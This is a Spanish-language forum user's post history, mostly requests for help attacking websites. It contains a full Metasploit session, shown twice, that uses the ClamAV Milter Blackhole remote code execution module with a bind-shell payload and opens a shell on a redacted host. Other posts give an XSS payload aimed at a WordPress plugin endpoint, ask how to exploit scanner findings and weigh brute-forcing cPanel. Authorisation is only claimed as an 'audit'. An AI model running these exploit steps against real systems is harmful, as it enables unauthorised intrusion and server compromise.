Si he probado con los demas payloads y me sigue dando el mismo error.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Dudas y pedidos generales / Re:MSF Sesion abierta, pero da error.
Febrero 16, 2014, 12:08:43 AM
Hola hermano, en primer lugar gracias por contestar.
Tienes razón, deberia haberme asegurado de que el servidor usa ClamAv. Pero no he encotrado informacion al respecto en google. Y una pregunta, ¿si abre sesión es porque es vulnerable?
O puede abrir sesión sin usar ClamAv, nose si me entiendes. Yo pensaba que como abre una sesión en msf era vulnerable, usaba ClamAv y que lo que fallaba era el payload que utilizaba. Por eso daba este error, Reason: Died from Errno::ECONNRESET.
Un Saludo.
Tienes razón, deberia haberme asegurado de que el servidor usa ClamAv. Pero no he encotrado informacion al respecto en google. Y una pregunta, ¿si abre sesión es porque es vulnerable?
O puede abrir sesión sin usar ClamAv, nose si me entiendes. Yo pensaba que como abre una sesión en msf era vulnerable, usaba ClamAv y que lo que fallaba era el payload que utilizaba. Por eso daba este error, Reason: Died from Errno::ECONNRESET.
Un Saludo.
#3
Dudas y pedidos generales / [SOLUCIONADO] MSF Sesion abierta, pero da error.
Febrero 15, 2014, 06:00:31 PM
He estado haciendo una auditoria a una web y viendo los puertos abiertos localice que tenia el puerto 25 (SMTP), busque un exploit para intentar explotarlo en msf:
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
- Started bind handler
- Command shell session 1 opened (192.168.229.130:59441 -> x.x.x.x:4444) at 2014-02-15 14:44:08 -0500
daemon
[Aqui sale una codificacion extraña] - x.x.x.x - Command shell session 1 closed. Reason: Died from Errno::ECONNRESET
Creo que lo configuro todo bien pero me sigue dando este error.. He probado con diferentes payloads y con todo sucede lo mismo.
¿Alguien puede ayudarme?
#4
Talleres Underc0de / Re:Taller de Python #2
Agosto 08, 2013, 07:28:38 PM
Muy bueno el tuto. Lo he estudiado a fondo tanto éste como el anterior y e hecho este programita que comprueba múltiplos, para así comprobar que sabia utilizar las estructuras de control if, elif, else, for y while. Espero una tercera entrega para poder aprender más.
Un Saludo, Krraskl13.
Un Saludo, Krraskl13.
#5
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 04:46:43 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Haciendo un scanner? Wtf?! Scanner es el programa con el que haces SCANNING.
Y, me parece a mi, o tienes informaciones en Vega cuando el SCANNER encuentra una vulnerabilidad IntegerOverflow?
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si haciendo un Scanner de vulnerabilidades con Vegas, y la informacion ofrecida por el programa no la entendia para explotarla ya me ha dado un buen empujon CalebBucker, con lo de explotacion a traves de SqlMap.
#7
Dudas y pedidos generales / Integer Overflow
Enero 25, 2013, 09:02:40 AM
Haciendo un scanner con Vegas de la distro Backtrack5 R3, a una web y me da 20 errores de Integer Overflow de riesgo alto. He buscado por google y por distintos foros, y solo encuentro vulnerabilidades de integer overflow en aplicaciones y eso pero nada de vulnerabilidades web.
Solo quiero informacion, o algun link por donde seguir buscando y aprender a explotar esa vulnerabilidad.
Saludos, Krraskl13.
Solo quiero informacion, o algun link por donde seguir buscando y aprender a explotar esa vulnerabilidad.
Saludos, Krraskl13.
#9
Dudas y pedidos generales / Re:Cross Site Scripting (XSS) HELP!
Enero 12, 2013, 02:32:58 PM
Espero estar haciendo algo mal.. Porque es la única vulnerabilidad que sale!!
Asi que no se que hacer..
Asi que no se que hacer..
#10
Dudas y pedidos generales / Re:Cross Site Scripting (XSS) HELP!
Enero 12, 2013, 11:42:37 AM
Tambien probe con el Live Http Headers.. Que se me olvido comentarlo, cargue la pagina http://www.*site*.com/wp-admin/admin-ajax.php en mozzilla y despues le di a repetir con el post:action=csp_po_dlg_new&name="><script>alert(1)</script>
Pero recargaba la pagina y seguia igual..
Pero recargaba la pagina y seguia igual..
#11
Dudas y pedidos generales / Re:Cross Site Scripting (CSS) HELP!
Enero 12, 2013, 11:29:06 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Primero que nada el Cross Site Scripting tiende a usar como acrónimo Xss no Css por otra parte como te podemos ayudar si no nos has proporcionado la URL.
Saludos,
Dedalo
Corregido!! Perdon por mi fallo.
Por otra parte queria decir que si he leido sobre XSS, solo que lo escribí mal y no me di cuenta.
El problema es que cuando abro la direccion que me indica el exploit http://www.*site*.com/wp-admin/admin-ajax.php me sale una pagina en blanco con un 0 arriba a la izquierda. Y ahi no hay ningun buscador ni ningun formulario para hacer XSS.
Entonces lo he probado en la URL de esta forma http://www.*site*.com/wp-admin/admin-ajax.php?action=csp_po_dlg_new&name="><script>alert(1)</script>
Pero tampoco. Por eso he pedido ayuda.
#12
Dudas y pedidos generales / Re:Cross Site Scripting (CSS) HELP!
Enero 12, 2013, 09:41:45 AM
WPScan, mira esto es lo que me devuelve:
#13
Dudas y pedidos generales / Cross Site Scripting (XSS) HELP!
Enero 11, 2013, 11:22:31 PM
Hola, me sale una vulnerabilidad en un WordPress del plugin WordPress CodeStyling Localization 1.99.16, y el escaner me devuelve este exploit:
Pero no consigo lanzarlo.. Alguien me ayuda ??
Pero no consigo lanzarlo.. Alguien me ayuda ??
#14
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 11, 2013, 08:27:10 PM
Acabo de actualizar el wpSCan y me ha dado dos vulnerabilidades por la version del WordPress 3.5, a ver si me podeis ayudar :
Me he instalado el wpps.rb pero no consigo llegar a nada.
Me he instalado el wpps.rb pero no consigo llegar a nada.
#15
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 11, 2013, 01:14:53 PM
Alguna sugerencia ??
Brute force al Cpanel no queda otra no ??
Brute force al Cpanel no queda otra no ??
#16
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 10, 2013, 05:38:17 PM
Despues de leer unos tutoriales, ya encontre mi fallo --wp-content-dir, necesita ir acompañado de algun path como el --enumerate.
He probado --enumerate vp, ap y p pero no se ha encontrado ningun plugin.
Sin embargo cuando hago la consulta:
Me salen un monton de plugins, para explotar. Pero no se puede acceder a ninguno de ellos.. Y no consigo llevar a cabo ningun exploit.
He probado --enumerate vp, ap y p pero no se ha encontrado ningun plugin.
Sin embargo cuando hago la consulta:
Me salen un monton de plugins, para explotar. Pero no se puede acceder a ninguno de ellos.. Y no consigo llevar a cabo ningun exploit.
#17
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 09, 2013, 11:32:31 AM
Ahora me salta otro error con -f
#18
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 08, 2013, 08:12:40 PM
Ya tengo la ultima version y me vuelve a dar el mismo error :
#19
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 08, 2013, 07:41:08 PM
Ya le pongo el pathname /wp-content/ pero sigue dando error :
#20
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 08, 2013, 11:58:31 AM
Acabo de pasarle el wpscan y me sale esto..